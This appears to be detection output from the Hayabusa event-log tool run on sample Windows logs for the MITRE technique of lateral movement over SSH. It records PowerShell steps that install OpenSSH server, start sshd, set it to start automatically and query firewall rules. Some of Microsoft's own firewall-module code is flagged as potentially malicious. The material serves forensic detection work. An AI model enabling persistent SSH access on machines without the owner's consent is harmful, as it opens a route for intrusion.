+2021-04-22 19:04:16.455 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-WindowsCapability): ""Add-WindowsCapability"" ParameterBinding(Add-WindowsCapability): name=""Online""; value=""True"" ParameterBinding(Add-WindowsCapability): name=""Name""; value=""OpenSSH.Server~~~~0.0.1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:04:16.455 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Microsoft.Dism.Commands.ImageObject""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:04:16.478 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:04:16.480 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:04:37.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Write-Host 'Final result: 1';,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:04:37.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""Final result: 1""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:04:37.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:04:37.671 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,$global:?,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx
+2021-04-22 19:19:29.476 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:29.479 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Start-Service sshd,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:30.035 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Start-Service): ""Start-Service"" ParameterBinding(Start-Service): name=""Name""; value=""sshd""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:30.036 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:30.039 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:30.041 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:32.548 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:32.559 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Service -Name sshd -StartupType 'Automatic',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:32.590 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Service): ""Set-Service"" ParameterBinding(Set-Service): name=""Name""; value=""sshd"" ParameterBinding(Set-Service): name=""StartupType""; value=""Automatic""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:32.590 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:32.593 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:32.595 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:36.172 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:36.183 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallRule -Name *ssh*,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent 